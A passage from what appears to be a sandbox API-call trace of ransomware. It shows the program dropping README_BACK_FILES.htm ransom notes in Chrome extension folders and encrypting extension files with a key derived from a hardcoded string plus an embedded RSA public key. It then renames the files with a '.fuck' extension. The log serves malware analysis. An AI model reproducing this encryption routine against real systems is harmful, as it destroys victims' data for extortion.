lpWideCharStr=0x0) returned 141 [0253.887] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d604, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0253.888] GetFileType (hFile=0x5d4c) returned 0x1 [0253.888] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2b9c250*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9c248, lpOverlapped=0x0 | out: lpBuffer=0x2b9c250*, lpNumberOfBytesWritten=0x2b9c248*=0x5ec, lpOverlapped=0x0) returned 1 [0253.889] FindNextFileA (in: hFindFile=0x2985f20, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 0 [0253.889] FindClose (in: hFindFile=0x2985f20 | out: hFindFile=0x2985f20) returned 1 [0253.889] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\readme_back_files.htm")) returned 0xffffffff [0253.890] AreFileApisANSI () returned 1 [0253.890] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x299b1e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 135 [0253.890] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d9a0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d40 [0253.891] GetFileType (hFile=0x5d40) returned 0x1 [0253.892] WriteFile (in: hFile=0x5d40, lpBuffer=0x2b9c5ec*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9c5e4, lpOverlapped=0x0 | out: lpBuffer=0x2b9c5ec*, lpNumberOfBytesWritten=0x2b9c5e4*=0x5ec, lpOverlapped=0x0) returned 1 [0253.893] FindNextFileA (in: hFindFile=0x29388b8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0253.893] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\*.*", lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 0x28e8078 [0253.893] FindNextFileA (in: hFindFile=0x28e8078, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0253.893] FindNextFileA (in: hFindFile=0x28e8078, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0253.893] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\*.*", lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 0x28e7df8 [0253.912] FindNextFileA (in: hFindFile=0x28e7df8, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0253.912] FindNextFileA (in: hFindFile=0x28e7df8, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0253.912] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d390 | out: lpSystemTimeAsFileTime=0x2b9d390) [0253.912] GetLastError () returned 0x0 [0253.912] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png")) returned 0x20 [0253.914] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png", dwFileAttributes=0x80) returned 1 [0253.914] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0253.915] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0253.917] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png.gsg", dwFileAttributes=0x2) returned 1 [0253.917] CryptAcquireContextA (in: phProv=0x2b9c38c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c38c*=0x2989738) returned 1 [0253.920] CryptCreateHash (in: hProv=0x2989738, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c390 | out: phHash=0x2b9c390) returned 1 [0253.921] lstrlenA (lpString="zthKOztpbIbcaEcLZlwCTDmazMlQm") returned 29 [0253.921] CryptHashData (hHash=0x2985a20, pbData=0x28cb3a0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0253.921] CryptDeriveKey (in: hProv=0x2989738, Algid=0x6610, hBaseData=0x2985a20, dwFlags=0x1000000, phKey=0x2b9c37c | out: phKey=0x2b9c37c*=0x2985f20) returned 1 [0253.921] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0253.921] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c398, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374 | out: pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374) returned 1 [0253.921] CryptAcquireContextA (in: phProv=0x2b9c388, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c388*=0x2987758) returned 1 [0253.922] CryptImportPublicKeyInfo (in: hCryptProv=0x2987758, dwCertEncodingType=0x1, pInfo=0x298ee90*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x298eec0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x298eec8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c380 | out: phKey=0x2b9c380*=0x2984be0) returned 1 [0253.922] CryptEncrypt (in: hKey=0x2984be0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c370*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c370*=0x80) returned 1 [0253.922] CryptEncrypt (in: hKey=0x2984be0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x29877e0*, pdwDataLen=0x2b9c384*=0x18, dwBufLen=0x80 | out: pbData=0x29877e0*, pdwDataLen=0x2b9c384*=0x80) returned 1 [0253.922] WriteFile (in: hFile=0x5d50, lpBuffer=0x29877e0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x29877e0*, lpNumberOfBytesWritten=0x2b9c394*=0x80, lpOverlapped=0x0) returned 1 [0253.924] ReadFile (in: hFile=0x5d64, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0253.937] CryptEncrypt (in: hKey=0x2985f20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0253.941] WriteFile (in: hFile=0x5d50, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0253.956] ReadFile (in: hFile=0x5d64, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0253.957] CryptEncrypt (in: hKey=0x2985f20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0253.957] WriteFile (in: hFile=0x5d50, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0253.957] ReadFile (in: hFile=0x5d64, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0253.957] CryptEncrypt (in: hKey=0x2985f20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0253.957] WriteFile (in: hFile=0x5d50, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0253.957] ReadFile (in: hFile=0x5d64, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0253.957] CryptEncrypt (in: hKey=0x2985f20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0253.957] WriteFile (in: hFile=0x5d50, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0253.957] ReadFile (in: hFile=0x5d64, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0253.957] CryptEncrypt (in: hKey=0x2985f20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0253.957] WriteFile (in: hFile=0x5d50, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0253.958] ReadFile (in: hFile=0x5d64, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x1f8, lpOverlapped=0x0) returned 1 [0253.958] CryptEncrypt (in: hKey=0x2985f20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x1f8, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x200) returned 1 [0253.958] WriteFile (in: hFile=0x5d50, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x200, lpOverlapped=0x0) returned 1 [0253.958] CloseHandle (hObject=0x5d64) returned 1 [0253.958] CloseHandle (hObject=0x5d50) returned 1 [0253.958] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png"), bFailIfExists=0) returned 1 [0253.962] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png", dwFileAttributes=0x0) returned 1 [0253.962] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png.gsg")) returned 1 [0253.964] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png.fuck")) returned 1 [0253.965] CryptDestroyHash (hHash=0x2985a20) returned 1 [0253.965] CryptDestroyKey (hKey=0x2985f20) returned 1 [0253.965] CryptReleaseContext (hProv=0x2989738, dwFlags=0x0) returned 1 [0253.965] FindNextFileA (in: hFindFile=0x28e7df8, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0253.965] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d390 | out: lpSystemTimeAsFileTime=0x2b9d390) [0253.965] GetLastError () returned 0x0 [0253.965] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js")) returned 0x20 [0253.973] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js", dwFileAttributes=0x80) returned 1 [0253.974] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0253.975] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0253.975] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js.gsg", dwFileAttributes=0x2) returned 1 [0253.976] CryptAcquireContextA (in: phProv=0x2b9c38c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c38c*=0x29876d0) returned 1 [0253.979] CryptCreateHash (in: hProv=0x29876d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c390 | out: phHash=0x2b9c390) returned 1 [0253.979] lstrlenA (lpString="zthKOztpbIbcaEcLZlwCTDmazMlQm") returned 29 [0253.979] CryptHashData (hHash=0x2985ea0, pbData=0x28cb5d0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0253.979] CryptDeriveKey (in: hProv=0x29876d0, Algid=0x6610, hBaseData=0x2985ea0, dwFlags=0x1000000, phKey=0x2b9c37c | out: phKey=0x2b9c37c*=0x2985f20) returned 1 [0253.979] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0253.979] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c398, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374 | out: pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374) returned 1 [0253.979] CryptAcquireContextA (in: phProv=0x2b9c388, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c388*=0x29878f0) returned 1 [0253.980] CryptImportPublicKeyInfo (in: hCryptProv=0x29878f0, dwCertEncodingType=0x1, pInfo=0x298edc0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x298edf0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x298edf8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c380 | out: phKey=0x2b9c380*=0x2984fa0) returned 1 [0253.980] CryptEncrypt (in: hKey=0x2984fa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c370*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c370*=0x80) returned 1 [0253.980] CryptEncrypt (in: hKey=0x2984fa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2987978*, pdwDataLen=0x2b9c384*=0x18, dwBufLen=0x80 | out: pbData=0x2987978*, pdwDataLen=0x2b9c384*=0x80) returned 1 [0253.980] WriteFile (in: hFile=0x5d64, lpBuffer=0x2987978*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x2987978*, lpNumberOfBytesWritten=0x2b9c394*=0x80, lpOverlapped=0x0) returned 1 [0253.981] ReadFile (in: hFile=0x5d50, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0253.993] CryptEncrypt (in: hKey=0x2985f20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0253.994] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0254.006] ReadFile (in: hFile=0x5d50, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0254.006] CryptEncrypt (in: hKey=0x2985f20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0254.007] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0254.007] ReadFile (in: hFile=0x5d50, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0254.007] CryptEncrypt (in: hKey=0x2985f20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0254.007] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0254.007] ReadFile (in: hFile=0x5d50, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0254.007] CryptEncrypt (in: hKey=0x2985f20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0254.007] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0254.007] ReadFile (in: hFile=0x5d50, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x303, lpOverlapped=0x0) returned 1 [0254.007] CryptEncrypt (in: hKey=0x2985f20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x303, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x310) returned 1 [0254.007] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x310, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x310, lpOverlapped=0x0) returned 1 [0254.007] CloseHandle (hObject=0x5d50) returned 1 [0254.008] CloseHandle (hObject=0x5d64) returned 1 [0254.008] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js"), bFailIfExists=0) returned 1 [0254.012] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User 